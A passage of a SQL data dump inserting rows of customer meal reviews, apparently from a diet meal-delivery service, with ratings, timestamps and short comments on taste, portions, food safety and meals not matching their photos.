spicy',3.00,NULL,1,'2020-07-18 07:48:37','2020-07-18 07:48:37',NULL),(114,16123,0,'meals','pending',104,'very tasty I liked the combination',5.00,NULL,1,'2020-07-18 17:01:06','2020-07-18 17:01:06',NULL),(115,16131,0,'meals','pending',104,'edible',4.00,NULL,1,'2020-07-18 17:01:30','2020-07-18 17:01:30',NULL),(116,27559,0,'meals','pending',238,'The taste was great with the combination of egg and chicken in it',5.00,NULL,1,'2020-11-09 16:30:23','2020-11-09 16:30:23',NULL),(117,35956,0,'meals','pending',328,'Loved it',5.00,NULL,1,'2021-01-19 15:18:10','2021-01-19 15:18:10',NULL),(118,100154,29,'meals','pending',1,'testing',0.00,NULL,1,'2021-03-22 16:59:24','2021-03-22 16:59:24',NULL),(119,100297,28,'meals','pending',1,'',0.00,NULL,1,'2021-03-22 17:12:48','2021-03-22 17:12:48',NULL),(120,100297,30,'meals','pending',1,'tast great',0.00,NULL,1,'2021-03-22 17:13:05','2021-03-22 17:13:05',NULL),(121,100143,30,'meals','pending',451,'',0.00,NULL,1,'2021-03-22 18:33:14','2021-03-22 18:33:14',NULL),(122,100128,28,'meals','pending',459,'',0.00,NULL,1,'2021-03-22 21:27:28','2021-03-22 21:27:28',NULL),(123,100296,30,'meals','pending',462,'it was too much spicy',0.00,NULL,1,'2021-03-23 06:36:51','2021-03-23 06:36:51',NULL),(124,100299,30,'meals','pending',1,'ffg',0.00,NULL,1,'2021-03-23 18:19:43','2021-03-23 18:19:43',NULL),(125,100293,31,'meals','pending',3,'test',0.00,NULL,1,'2021-03-23 21:33:07','2021-03-23 21:33:07',NULL),(126,100262,28,'meals','pending',472,'',0.00,NULL,1,'2021-03-25 21:06:28','2021-03-25 21:06:28',NULL),(127,100118,28,'meals','pending',473,'',0.00,NULL,1,'2021-03-29 14:37:35','2021-03-29 14:37:35',NULL),(128,100118,28,'meals','pending',473,'',0.00,NULL,1,'2021-03-29 14:42:06','2021-03-29 14:42:06',NULL),(129,100118,28,'meals','pending',1,'rrr',0.00,NULL,1,'2021-03-29 14:43:58','2021-03-29 14:43:58',NULL),(130,100196,28,'meals','pending',1,'',4.50,NULL,1,'2021-03-29 14:46:55','2021-03-29 14:46:55',NULL),(131,100316,28,'meals','pending',1,'',4.50,NULL,1,'2021-04-05 16:16:22','2021-04-05 16:16:22',NULL),(132,100175,28,'meals','pending',556,'',4.50,NULL,1,'2021-05-25 18:33:33','2021-05-25 18:33:33',NULL),(133,100104,30,'meals','pending',548,'',1.50,NULL,1,'2021-05-27 03:43:07','2021-05-27 03:43:07',NULL),(134,100110,28,'meals','pending',548,'',5.00,NULL,1,'2021-05-27 03:43:27','2021-05-27 03:43:27',NULL),(135,100293,31,'meals','pending',548,'',3.00,NULL,1,'2021-05-27 03:43:47','2021-05-27 03:43:47',NULL),(136,100197,28,'meals','pending',606,'',5.00,NULL,1,'2021-06-01 16:48:03','2021-06-01 16:48:03',NULL),(137,100138,28,'meals','pending',606,'',4.50,NULL,1,'2021-06-02 20:28:04','2021-06-02 20:28:04',NULL),(138,100247,28,'meals','pending',642,'',4.50,NULL,1,'2021-06-04 15:54:47','2021-06-04 15:54:47',NULL),(139,100250,28,'meals','pending',642,'',4.50,NULL,1,'2021-06-05 05:16:32','2021-06-05 05:16:32',NULL),(140,100249,28,'meals','pending',642,'',4.50,NULL,1,'2021-06-05 17:21:10','2021-06-05 17:21:10',NULL),(141,100248,28,'meals','pending',642,'',4.50,NULL,1,'2021-06-05 17:21:27','2021-06-05 17:21:27',NULL),(142,100251,28,'meals','pending',642,'',4.50,NULL,1,'2021-06-06 09:49:42','2021-06-06 09:49:42',NULL),(143,100188,28,'meals','pending',598,'it was a awesome lunch snack n dinner yesterday',4.50,NULL,1,'2021-06-08 08:02:16','2021-06-08 08:02:16',NULL),(144,100177,31,'meals','pending',657,'Please avoid mayonnaise ',4.50,NULL,1,'2021-06-12 09:41:50','2021-06-12 09:41:50',NULL),(145,100262,30,'meals','pending',657,'',4.50,NULL,1,'2021-06-12 09:42:09','2021-06-12 09:42:09',NULL),(146,100262,30,'meals','pending',664,'i liked the veggies ....just the fact that i got chicken in every meal was repeatitive',4.50,NULL,1,'2021-06-12 17:48:47','2021-06-12 17:48:47',NULL),(147,100177,31,'meals','pending',664,'i liked it',4.50,NULL,1,'2021-06-12 17:49:28','2021-06-12 17:49:28',NULL),(148,100176,31,'meals','pending',664,'the milk curdles in the coffee instead of mixing well\n',4.50,NULL,1,'2021-06-12 17:51:39','2021-06-12 17:51:39',NULL),(149,100197,31,'meals','pending',664,'it was good but one tiny piece of broccoli in my meal, not like the one in the picture',4.50,NULL,1,'2021-06-16 09:31:23','2021-06-16 09:31:23',NULL),(150,100138,31,'meals','pending',664,'i did not get this ...got a chicken wrap whyyyyy',4.50,NULL,1,'2021-06-17 16:21:01','2021-06-17 16:21:01',NULL),(151,100319,30,'meals','pending',590,'',4.50,NULL,1,'2021-06-18 09:07:28','2021-06-18 09:07:28',NULL),(152,100285,31,'meals','pending',590,'The quantity was not enough. It was boiled egg with not scrambled.',4.50,NULL,1,'2021-06-21 04:55:20','2021-06-21 04:55:20',NULL),(153,100166,29,'meals','pending',657,'',4.50,NULL,1,'2021-06-22 15:16:15','2021-06-22 15:16:15',NULL),(154,100302,30,'meals','pending',709,'the chicken should be ground further so it has a Haleem like consistency',2.00,NULL,1,'2021-06-25 10:13:20','2021-06-25 10:13:20',NULL),(155,100281,28,'meals','pending',709,'the cupcakes were good but the liners were stuck to the cupcakes so it made eating them really diffocult',4.00,NULL,1,'2021-06-25 10:13:57','2021-06-25 10:13:57',NULL),(156,100278,28,'meals','pending',709,'This coconut milk pudding is excellent. a great breakfast option!!',5.00,NULL,1,'2021-06-26 13:27:09','2021-06-26 13:27:09',NULL),(157,100176,29,'meals','pending',719,'the milk in the coffee did not dissolve, I think there was something wrong with the milk please look into that.',1.00,NULL,1,'2021-06-27 07:52:53','2021-06-27 07:52:53',NULL),(158,100262,30,'meals','pending',677,'chicken tasted fine but noodles were soggy and the carrot tasted off',1.00,NULL,1,'2021-06-27 13:44:05','2021-06-27 13:44:05',NULL),(159,100294,28,'meals','pending',687,'',4.50,NULL,1,'2021-07-04 11:32:36','2021-07-04 11:32:36',NULL),(160,100319,28,'meals','pending',687,'',5.00,NULL,1,'2021-07-04 11:33:12','2021-07-04 11:33:12',NULL),(161,100313,30,'meals','pending',719,'I didn’t like the texture it was more like a rubber. please add some other option next time instead of this',1.00,NULL,1,'2021-07-08 14:37:06','2021-07-08 14:37:06',NULL),(162,100214,29,'meals','pending',687,'',3.00,NULL,1,'2021-07-12 07:25:42','2021-07-12 07:25:42',NULL),(163,100110,28,'meals','pending',687,'',5.00,NULL,1,'2021-07-12 07:26:19','2021-07-12 07:26:19',NULL),(164,100110,28,'meals','pending',687,'',5.00,NULL,1,'2021-07-12 07:26:39','2021-07-12 07:26:39',NULL),(165,100201,28,'meals','pending',687,'',4.00,NULL,1,'2021-07-12 07:27:47','2021-07-12 07:27:47',NULL),(166,100166,28,'meals','pending',687,'',5.00,NULL,1,'2021-07-12 07:28:09','2021-07-12 07:28:09',NULL),(167,100143,28,'meals','pending',687,'',4.50,NULL,1,'2021-07-12 07:28:25','2021-07-12 07:28:25',NULL),(168,100128,28,'meals','pending',687,'',5.00,NULL,1,'2021-07-12 07:28:53','2021-07-12 07:28:53',NULL),(169,100160,28,'meals','pending',687,'',3.50,NULL,1,'2021-07-12 07:29:38','2021-07-12 07:29:38',NULL),(170,100211,28,'meals','pending',791,'',4.50,NULL,1,'2021-08-01 16:59:12','2021-08-01 16:59:12',NULL),(171,100186,28,'meals','pending',791,'',4.50,NULL,1,'2021-08-01 16:59:31','2021-08-01 16:59:31',NULL),(172,100190,30,'meals','pending',802,'it has egg skin in each bite ',4.50,NULL,1,'2021-08-03 10:14:48','2021-08-03 10:14:48',NULL),(173,100313,30,'meals','pending',330,'',4.50,NULL,1,'2021-08-07 15:57:02','2021-08-07 15:57:02',NULL),(174,100296,30,'meals','pending',590,'Chicken was raw',4.50,NULL,1,'2021-08-11 02:31:25','2021-08-11 02:31:25',NULL),(175,100299,31,'meals','pending',590,'Chicken is pink inside not properly cooked without feta. ',1.00,NULL,1,'2021-08-23 08:17:08','2021-08-23 08:17:08',NULL),(176,100152,29,'meals','pending',776,'The food was a bit spoiled and smelly ',4.50,NULL,1,'2021-09-01 10:26:23','2021-09-01 10:26:23',NULL),(177,100152,29,'meals','pending',776,'The food was a bit spoiled and smelly ',2.00,NULL,1,'2021-09-01 10:26:54','2021-09-01 10:26:54',NULL),(178,100108,28,'meals','pending',877,'',4.50,NULL,1,'2021-09-03 04:21:24','2021-09-03 04:21:24',NULL),(179,100129,31,'meals','pending',590,'The mince had so much smell that i could not even eat it. ',4.50,NULL,1,'2021-09-03 06:28:44','2021-09-03 06:28:44',NULL),(180,100299,30,'meals','pending',590,'Tasteless, quantity is very less no fetta',4.50,NULL,1,'2021-09-07 08:34:33','2021-09-07 08:34:33',NULL),(181,100198,28,'meals','pending',590,'Always luvs this',4.50,NULL,1,'2021-09-07 08:35:06','2021-09-07 08:35:06',NULL),(182,100108,28,'meals','pending',1073,'',4.50,NULL,1,'2021-09-18 16:31:01','2021-09-18 16:31:01',NULL),(183,100106,28,'meals','pending',1073,'',4.50,NULL,1,'2021-09-18 16:31:13','2021-09-18 16:31:13',NULL),(184,100238,28,'meals','pending',1021,'you need to add more options here btw. the Lentil Kabab was very good though !! a few basic vegetables would have been better instead of the bread i think but still good ! :)',4.50,NULL,1,'2021-09-27 14:48:08','2021-09-27 14:48:08',NULL),(185,100306,28,'meals','pending',920,'',4.50,NULL,1,'2021-09-28 09:44:45','2021-09-28 09:44:45',NULL),(186,100307,28,'meals','pending',920,'',4.50,NULL,1,'2021-09-28 16:49:48','2021-09-28 16:49:48',NULL),(187,100365,28,'meals','pending',920,'',5.00,NULL,1,'2021-09-30 12:05:28','2021-09-30 12:05:28',NULL),(188,100328,28,'meals','pending',920,'',3.00,NULL,1,'2021-09-30 12:05:44','2021-09-30 12:05:44',NULL),(189,100264,28,'meals','pending',920,'',5.00,NULL,1,'2021-09-30 12:05:57','2021-09-30 12:05:57',NULL),(190,100305,28,'meals','pending',920,'',4.00,NULL,1,'2021-09-30 12:06:19','2021-09-30 12:06:19',NULL),(191,100266,28,'meals','pending',920,'',4.50,NULL,1,'2021-09-30 12:06:55','2021-09-30 12:06:55',NULL),(192,100099,28,'meals','pending',1144,'bread was fresh and egg was perfectly seasoned..',5.00,NULL,1,'2021-10-01 06:35:26','2021-10-01 06:35:26',NULL),(193,100319,28,'meals','pending',1144,'',5.00,NULL,1,'2021-10-01 14:54:25','2021-10-01 14:54:25',NULL),(194,100176,28,'meals','pending',1144,'can I add splenda in it?',5.00,NULL,1,'2021-10-01 14:55:00','2021-10-01 14:55:00',NULL),(195,100152,28,'meals','pending',1144,'loved every bit of it',5.00,NULL,1,'2021-10-01 14:55:47','2021-10-01 14:55:47',NULL),(196,100299,30,'meals','pending',1143,'there was no feta cheese in my salad and the chicken was quite dry ',4.50,NULL,1,'2021-10-01 16:02:16','2021-10-01 16:02:16',NULL),(197,100299,28,'meals','pending',920,'',5.00,NULL,1,'2021-10-02 07:02:58','2021-10-02 07:02:58',NULL),(198,100367,28,'meals','pending',920,'very delicious ',5.00,NULL,1,'2021-10-02 07:03:19','2021-10-02 07:03:19',NULL),(199,100244,28,'meals','pending',920,'the steak was very tender and juicy. hats off to the team of Diet box ',5.00,NULL,1,'2021-10-02 07:04:01','2021-10-02 07:04:01',NULL),(200,100245,28,'meals','pending',920,'',5.00,NULL,1,'2021-10-02 07:04:18','2021-10-02 07:04:18',NULL),(201,100225,28,'meals','pending',920,'',5.00,NULL,1,'2021-10-02 07:04:36','2021-10-02 07:04:36',NULL),(202,100161,30,'meals','pending',1144,'',4.50,NULL,1,'2021-10-04 18:37:24','2021-10-04 18:37:24',NULL),(203,100155,28,'meals','pending',1144,'',5.00,NULL,1,'2021-10-04 18:37:46','2021-10-04 18:37:46',NULL),(204,100345,28,'meals','pending',1219,'',4.00,NULL,1,'2021-10-13 05:37:16','2021-10-13 05:37:16',NULL),(205,100344,28,'meals','pending',1219,'',5.00,NULL,1,'2021-10-13 11:18:02','2021-10-13 11:18:02',NULL),(206,100212,28,'meals','pending',1219,'',4.00,NULL,1,'2021-10-13 17:02:03','2021-10-13 17:02:03',NULL),(207,100236,31,'meals','pending',1219,'in the picture there appears to be more than what was actually delivered.. which is a little deceptive. \nthere was 1 slice of bread and a 1 slice of omelette and 1 cookie.. while in the picture there are 3 pieces of each',1.00,NULL,1,'2021-10-14 09:46:38','2021-10-14 09:46:38',NULL),(208,100298,31,'meals','pending',1219,'was okay',3.00,NULL,1,'2021-10-14 09:47:03','2021-10-14 09:47:03',NULL),(209,100236,31,'meals','pending',1219,'in the picture there appears to be more than what was delivered.. which is a little deceptive. \nthere was 1 slice of bread and a 1 slice of omelette and 1 cookie.. while in the picture there are three slices of omelet and three cookies along with two slices of bread',1.00,NULL,1,'2021-10-14 09:48:07','2021-10-14 09:48:07',NULL),(210,100317,28,'meals','pending',1219,'',5.00,NULL,1,'2021-10-14 15:21:16','2021-10-14 15:21:16',NULL),(211,100101,31,'meals','pending',1219,'are we supposed to get what\'s in the picture above? ',3.50,NULL,1,'2021-10-15 05:45:22','2021-10-15 05:45:22',NULL),(212,100138,28,'meals','pending',1219,'',5.00,NULL,1,'2021-10-15 10:56:45','2021-10-15 10:56:45',NULL),(213,100138,31,'meals','pending',1219,'hummus was missing',4.50,NULL,1,'2021-10-15 10:57:30','2021-10-15 10:57:30',NULL),(214,100211,28,'meals','pending',1219,'',5.00,NULL,1,'2021-10-15 17:02:31','2021-10-15 17:02:31',NULL),(215,100186,28,'meals','pending',1219,'',4.00,NULL,1,'2021-10-15 17:03:04','2021-10-15 17:03:04',NULL),(216,100099,31,'meals','pending',1219,'',4.00,NULL,1,'2021-10-16 16:45:44','2021-10-16 16:45:44',NULL),(217,100319,28,'meals','pending',1219,'',5.00,NULL,1,'2021-10-16 16:45:54','2021-10-16 16:45:54',NULL),(218,100152,31,'meals','pending',1219,'',3.50,NULL,1,'2021-10-16 18:33:11','2021-10-16 18:33:11',NULL),(219,100364,28,'meals','pending',1219,'',5.00,NULL,1,'2021-10-17 14:27:26','2021-10-17 14:27:26',NULL),(220,100364,28,'meals','pending',1219,'',5.00,NULL,1,'2021-10-17 23:19:40','2021-10-17 23:19:40',NULL),(221,100294,29,'meals','pending',1219,'',2.00,NULL,1,'2021-10-17 23:20:10','2021-10-17 23:20:10',NULL),(222,100129,28,'meals','pending',1219,'',4.00,NULL,1,'2021-10-17 23:20:27','2021-10-17 23:20:27',NULL),(223,100108,31,'meals','pending',1219,'',3.00,NULL,1,'2021-10-18 10:20:14','2021-10-18 10:20:14',NULL),(224,100106,31,'meals','pending',1219,'',3.00,NULL,1,'2021-10-18 10:20:40','2021-10-18 10:20:40',NULL),(225,100160,29,'meals','pending',1219,'',1.00,NULL,1,'2021-10-18 10:20:54','2021-10-18 10:20:54',NULL),(226,100285,28,'meals','pending',1219,'',5.00,NULL,1,'2021-10-20 02:08:28','2021-10-20 02:08:28',NULL),(227,100128,28,'meals','pending',1219,'',5.00,NULL,1,'2021-10-20 02:08:47','2021-10-20 02:08:47',NULL),(228,100161,28,'meals','pending',1219,'',5.00,NULL,1,'2021-10-20 02:08:57','2021-10-20 02:08:57',NULL),(229,100155,31,'meals','pending',1219,'',3.00,NULL,1,'2021-10-20 02:09:20','2021-10-20 02:09:20',NULL),(230,100316,31,'meals','pending',1219,'',3.50,NULL,1,'2021-10-20 05:35:48','2021-10-20 05:35:48',NULL),(231,100143,28,'meals','pending',1219,'',5.00,NULL,1,'2021-10-20 05:36:00','2021-10-20 05:36:00',NULL),(232,100166,29,'meals','pending',1219,'it had a little weird taste.. even when it arrived was kept on the fridge',3.00,NULL,1,'2021-10-20 16:36:57','2021-10-20 16:36:57',NULL),(233,100188,31,'meals','pending',1219,'it was filling',3.00,NULL,1,'2021-10-20 16:37:31','2021-10-20 16:37:31',NULL),(234,100188,28,'meals','pending',1269,'',5.00,NULL,1,'2021-10-20 23:41:55','2021-10-20 23:41:55',NULL),(235,100286,28,'meals','pending',1219,'',5.00,NULL,1,'2021-10-21 05:08:55','2021-10-21 05:08:55',NULL),(236,100176,31,'meals','pending',1219,'',3.00,NULL,1,'2021-10-21 05:09:07','2021-10-21 05:09:07',NULL),(237,100201,28,'meals','pending',1219,'',5.00,NULL,1,'2021-10-21 08:48:59','2021-10-21 08:48:59',NULL),(238,100295,30,'meals','pending',1219,'',1.00,NULL,1,'2021-10-21 16:17:03','2021-10-21 16:17:03',NULL),(239,100144,31,'meals','pending',1219,'The food did not look anything like the picture but the opposite',2.00,NULL,1,'2021-10-22 18:49:41','2021-10-22 18:49:41',NULL),(240,100299,31,'meals','pending',1219,'',3.00,NULL,1,'2021-10-22 18:49:55','2021-10-22 18:49:55',NULL),(241,100198,31,'meals','pending',1219,'',3.50,NULL,1,'2021-10-22 18:50:05','2021-10-22 18:50:05',NULL),(242,100296,31,'meals','pending',1219,'The food tasted good but didn\'t match the content of the picture',4.00,NULL,1,'2021-10-22 18:51:44','2021-10-22 18:51:44',NULL),(243,100104,28,'meals','pending',1314,'Taste wise very good. just got soggy so may sauce to be given separately next time. ',5.00,NULL,1,'2021-10-23 09:19:05','2021-10-23 09:19:05',NULL),(244,100195,31,'meals','pending',1219,'',3.50,NULL,1,'2021-10-25 00:35:31','2021-10-25 00:35:31',NULL),(245,100214,31,'meals','pending',1219,'',3.00,NULL,1,'2021-10-25 00:35:42','2021-10-25 00:35:42',NULL),(246,100160,31,'meals','pending',1219,'',3.00,NULL,1,'2021-10-25 00:35:54','2021-10-25 00:35:54',NULL),(247,100148,31,'meals','pending',1219,'',3.50,NULL,1,'2021-10-25 00:36:08','2021-10-25 00:36:08',NULL),(248,100148,30,'meals','pending',1314,'the kabab was very dry and hard',3.00,NULL,1,'2021-10-25 15:05:34','2021-10-25 15:05:34',NULL),(249,100365,30,'meals','pending',1314,'Food does not match picture. also it was very hard and dry. ',3.00,NULL,1,'2021-10-25 15:06:11','2021-10-25 15:06:11',NULL),(250,100177,28,'meals','pending',1219,'',5.00,NULL,1,'2021-10-25 22:48:11','2021-10-25 22:48:11',NULL),(251,100365,28,'meals','pending',1219,'',4.00,NULL,1,'2021-10-25 22:48:26','2021-10-25 22:48:26',NULL),(252,100370,28,'meals','pending',1219,'',5.00,NULL,1,'2021-10-25 22:48:40','2021-10-25 22:48:40',NULL),(253,100154,31,'meals','pending',1219,'',3.50,NULL,1,'2021-10-27 04:36:51','2021-10-27 04:36:51',NULL),(254,100343,28,'meals','pending',1219,'',4.00,NULL,1,'2021-10-27 04:37:02','2021-10-27 04:37:02',NULL),(255,100347,31,'meals','pending',1219,'',3.50,NULL,1,'2021-10-27 04:37:16','2021-10-27 04:37:16',NULL),(256,100197,28,'meals','pending',1219,'',4.00,NULL,1,'2021-10-27 04:37:26','2021-10-27 04:37:26',NULL),(257,100238,28,'meals','pending',1354,'',4.50,NULL,1,'2021-10-27 10:14:44','2021-10-27 10:14:44',NULL),(258,100196,31,'meals','pending',1219,'',3.00,NULL,1,'2021-10-27 18:33:21','2021-10-27 18:33:21',NULL),(259,100238,28,'meals','pending',1219,'',4.00,NULL,1,'2021-10-27 18:33:38','2021-10-27 18:33:38',NULL),(260,100131,28,'meals','pending',1219,'',5.00,NULL,1,'2021-10-27 18:33:47','2021-10-27 18:33:47',NULL),(261,100345,28,'meals','pending',1219,'',5.00,NULL,1,'2021-10-28 08:45:07','2021-10-28 08:45:07',NULL),(262,100344,28,'meals','pending',1219,'',5.00,NULL,1,'2021-10-28 08:45:16','2021-10-28 08:45:16',NULL),(263,100345,30,'meals','pending',1314,'not good at all. taste also not good. ',4.50,NULL,1,'2021-10-28 16:11:14','2021-10-28 16:11:14',NULL),(264,100101,31,'meals','pending',1219,'',3.50,NULL,1,'2021-10-30 14:03:33','2021-10-30 14:03:33',NULL),(265,100186,28,'meals','pending',1219,'',5.00,NULL,1,'2021-10-30 14:03:42','2021-10-30 14:03:42',NULL),(266,100211,28,'meals','pending',1219,'',4.00,NULL,1,'2021-10-30 14:03:55','2021-10-30 14:03:55',NULL),(267,100138,28,'meals','pending',1219,'',5.00,NULL,1,'2021-10-30 14:04:07','2021-10-30 14:04:07',NULL),(268,100099,28,'meals','pending',1219,'',5.00,NULL,1,'2021-10-31 18:55:09','2021-10-31 18:55:09',NULL),(269,100101,28,'meals','pending',1219,'',5.00,NULL,1,'2021-10-31 18:55:25','2021-10-31 18:55:25',NULL),(270,100319,28,'meals','pending',1219,'',3.50,NULL,1,'2021-10-31 18:56:07','2021-10-31 18:56:07',NULL),(271,100176,29,'meals','pending',1314,'coffee is horrible. milk is oxidized. it becomes chunks. please do not send coffee ',1.00,NULL,1,'2021-11-01 16:03:21','2021-11-01 16:03:21',NULL),(272,100108,28,'meals','pending',1219,'',5.00,NULL,1,'2021-11-02 07:56:32','2021-11-02 07:56:32',NULL),(273,100135,28,'meals','pending',1219,'',4.00,NULL,1,'2021-11-02 18:22:58','2021-11-02 18:22:58',NULL),(274,100285,28,'meals','pending',1219,'',4.00,NULL,1,'2021-11-03 17:42:08','2021-11-03 17:42:08',NULL),(275,100128,28,'meals','pending',1219,'',5.00,NULL,1,'2021-11-03 17:42:16','2021-11-03 17:42:16',NULL),(276,100161,28,'meals','pending',1219,'',5.00,NULL,1,'2021-11-03 17:42:23','2021-11-03 17:42:23',NULL),(277,100155,30,'meals','pending',1219,'',1.00,NULL,1,'2021-11-03 17:42:34','2021-11-03 17:42:34',NULL),(278,100316,28,'meals','pending',1219,'',5.00,NULL,1,'2021-11-04 07:52:23','2021-11-04 07:52:23',NULL),(279,100286,28,'meals','pending',1219,'',5.00,NULL,1,'2021-11-05 10:05:54','2021-11-05 10:05:54',NULL),(280,100201,28,'meals','pending',1219,'',4.00,NULL,1,'2021-11-05 10:06:09','2021-11-05 10:06:09',NULL),(281,100295,30,'meals','pending',1219,'',1.00,NULL,1,'2021-11-05 20:34:11','2021-11-05 20:34:11',NULL),(282,100299,31,'meals','pending',1314,'there is nothing here nothing like the pic. no chess even!!!!!',1.00,NULL,1,'2021-11-06 09:46:00','2021-11-06 09:46:00',NULL),(283,100370,28,'meals','pending',1219,'',5.00,NULL,1,'2021-11-09 17:04:36','2021-11-09 17:04:36',NULL),(284,100365,28,'meals','pending',1219,'',5.00,NULL,1,'2021-11-09 17:04:44','2021-11-09 17:04:44',NULL),(285,100128,28,'meals','pending',1389,'',4.50,NULL,1,'2021-11-09 18:16:54','2021-11-09 18:16:54',NULL),(286,100347,28,'meals','pending',1389,'send this more often',4.50,NULL,1,'2021-11-10 19:07:40','2021-11-10 19:07:40',NULL),(287,100196,31,'meals','pending',1219,'',3.00,NULL,1,'2021-11-11 16:07:26','2021-11-11 16:07:26',NULL),(288,100238,31,'meals','pending',1219,'',3.50,NULL,1,'2021-11-11 16:07:42','2021-11-11 16:07:42',NULL),(289,100131,28,'meals','pending',1219,'',5.00,NULL,1,'2021-11-11 20:18:38','2021-11-11 20:18:38',NULL),(290,100294,30,'meals','pending',1219,'',1.00,NULL,1,'2021-11-16 19:24:59','2021-11-16 19:24:59',NULL),(291,100364,28,'meals','pending',1219,'',5.00,NULL,1,'2021-11-16 19:25:12','2021-11-16 19:25:12',NULL),(292,100129,30,'meals','pending',1219,'',1.00,NULL,1,'2021-11-16 19:25:45','2021-11-16 19:25:45',NULL),(293,100108,31,'meals','pending',1219,'',3.50,NULL,1,'2021-11-17 18:05:39','2021-11-17 18:05:39',NULL),(294,100106,28,'meals','pending',1219,'',5.00,NULL,1,'2021-11-17 18:05:47','2021-11-17 18:05:47',NULL),(295,100160,28,'meals','pending',1219,'',4.00,NULL,1,'2021-11-17 18:05:59','2021-11-17 18:05:59',NULL),(296,100135,31,'meals','pending',1219,'',3.50,NULL,1,'2021-11-17 18:06:12','2021-11-17 18:06:12',NULL),(297,100295,28,'meals','pending',1403,'',4.50,NULL,1,'2021-11-20 07:18:56','2021-11-20 07:18:56',NULL),(298,100201,28,'meals','pending',1403,'',4.50,NULL,1,'2021-11-20 07:19:26','2021-11-20 07:19:26',NULL),(299,100143,28,'meals','pending',1403,'yummy taste ',4.50,NULL,1,'2021-11-20 07:20:43','2021-11-20 07:20:43',NULL),(300,100188,28,'meals','pending',1403,'zabardast',4.50,NULL,1,'2021-11-20 07:21:08','2021-11-20 07:21:08',NULL),(301,100286,28,'meals','pending',1219,'',5.00,NULL,1,'2021-11-20 12:02:33','2021-11-20 12:02:33',NULL),(302,100201,28,'meals','pending',1219,'',5.00,NULL,1,'2021-11-20 12:02:42','2021-11-20 12:02:42',NULL),(303,100143,28,'meals','pending',1219,'',5.00,NULL,1,'2021-11-20 12:02:53','2021-11-20 12:02:53',NULL),(304,100166,28,'meals','pending',1219,'',4.00,NULL,1,'2021-11-20 12:03:14','2021-11-20 12:03:14',NULL),(305,100316,28,'meals','pending',1219,'',5.00,NULL,1,'2021-11-20 12:03:26','2021-11-20 12:03:26',NULL),(306,100188,31,'meals','pending',1219,'',3.00,NULL,1,'2021-11-20 12:03:39','2021-11-20 12:03:39',NULL),(307,100295,30,'meals','pending',1219,'',1.00,NULL,1,'2021-11-20 12:15:51','2021-11-20 12:15:51',NULL),(308,100295,30,'meals','pending',1219,'',1.00,NULL,1,'2021-11-20 20:05:33','2021-11-20 20:05:33',NULL),(309,100342,30,'meals','pending',1219,'',1.00,NULL,1,'2021-11-22 15:44:54','2021-11-22 15:44:54',NULL),(310,100110,28,'meals','pending',1219,'',4.00,NULL,1,'2021-11-22 15:45:10','2021-11-22 15:45:10',NULL),(311,100104,31,'meals','pending',1219,'',3.50,NULL,1,'2021-11-22 15:45:22','2021-11-22 15:45:22',NULL),(312,100195,28,'meals','pending',1219,'',4.00,NULL,1,'2021-11-24 05:11:19','2021-11-24 05:11:19',NULL),(313,100214,31,'meals','pending',1219,'',3.50,NULL,1,'2021-11-24 05:11:37','2021-11-24 05:11:37',NULL),(314,100148,28,'meals','pending',1219,'',5.00,NULL,1,'2021-11-24 05:11:50','2021-11-24 05:11:50',NULL),(315,100370,28,'meals','pending',1219,'',5.00,NULL,1,'2021-11-24 09:45:13','2021-11-24 09:45:13',NULL),(316,100365,28,'meals','pending',1219,'',5.00,NULL,1,'2021-11-24 09:45:25','2021-11-24 09:45:25',NULL),(317,100283,30,'meals','pending',750,'',4.50,NULL,1,'2021-11-25 16:13:39','2021-11-25 16:13:39',NULL),(318,100267,30,'meals','pending',750,'',4.50,NULL,1,'2021-11-26 17:54:15','2021-11-26 17:54:15',NULL),(319,100345,28,'meals','pending',1403,'',4.50,NULL,1,'2021-11-27 15:42:33','2021-11-27 15:42:33',NULL),(320,100344,28,'meals','pending',1403,'',5.00,NULL,1,'2021-11-27 15:43:30','2021-11-27 15:43:30',NULL),(321,100345,28,'meals','pending',1403,'',5.00,NULL,1,'2021-11-27 15:43:45','2021-11-27 15:43:45',NULL),(322,100212,28,'meals','pending',1403,'',5.00,NULL,1,'2021-11-27 15:44:01','2021-11-27 15:44:01',NULL),(323,100345,30,'meals','pending',1314,'very tasteless. not good at all',2.00,NULL,1,'2021-11-28 06:16:40','2021-11-28 06:16:40',NULL),(324,100285,31,'meals','pending',1481,'The quantity is day by day decreasing and as mentioned this is 200g I have taken picture of the box which is 100g including the box\nthat’s cheating with the customers',1.00,NULL,1,'2021-12-03 09:25:33','2021-12-03 09:25:33',NULL),(325,100110,28,'meals','pending',1589,'',4.50,NULL,1,'2021-12-08 02:25:12','2021-12-08 02:25:12',NULL),(326,100148,28,'meals','pending',1403,'',5.00,NULL,1,'2021-12-09 12:25:16','2021-12-09 12:25:16',NULL),(327,100365,28,'meals','pending',1403,'yumy',5.00,NULL,1,'2021-12-09 12:25:38','2021-12-09 12:25:38',NULL),(328,100214,28,'meals','pending',1403,'tasty',5.00,NULL,1,'2021-12-09 12:26:04','2021-12-09 12:26:04',NULL),(329,100345,28,'meals','pending',1403,'yummiest ',5.00,NULL,1,'2021-12-12 12:43:37','2021-12-12 12:43:37',NULL),(330,100212,28,'meals','pending',1403,'very tasty',5.00,NULL,1,'2021-12-12 12:44:15','2021-12-12 12:44:15',NULL),(331,100236,28,'meals','pending',1403,'',5.00,NULL,1,'2021-12-13 17:16:38','2021-12-13 17:16:38',NULL),(332,100201,28,'meals','pending',1697,'',4.50,NULL,1,'2021-12-20 16:22:53','2021-12-20 16:22:53',NULL),(333,100186,30,'meals','pending',1403,'hi there is no chutni and salad only single pice of dry chicken.no taste ',4.50,NULL,1,'2021-12-28 11:33:44','2021-12-28 11:33:44',NULL),(334,100160,31,'meals','pending',1738,'i dont like carrots pls exclude them for me , add more cucumbers instead of carrots ,thanks',4.50,NULL,1,'2021-12-30 14:53:12','2021-12-30 14:53:12',NULL),(335,100135,30,'meals','pending',1785,'',4.50,NULL,1,'2022-01-20 14:18:49','2022-01-20 14:18:49',NULL),(336,100432,28,'meals','pending',1785,'',4.50,NULL,1,'2022-01-22 23:01:34','2022-01-22 23:01:34',NULL),(337,100426,30,'meals','pending',1785,'',4.50,NULL,1,'2022-01-23 13:18:26','2022-01-23 13:18:26',NULL),(338,100296,31,'meals','pending',1727,'',4.50,NULL,1,'2022-01-24 13:41:09','2022-01-24 13:41:09',NULL),(339,100296,31,'meals','pending',1785,'there were only vegetables\nno steak',4.50,NULL,1,'2022-01-24 19:19:18','2022-01-24 19:19:18',NULL),(340,100372,28,'meals','pending',1752,'',4.50,NULL,1,'2022-02-03 12:05:51','2022-02-03 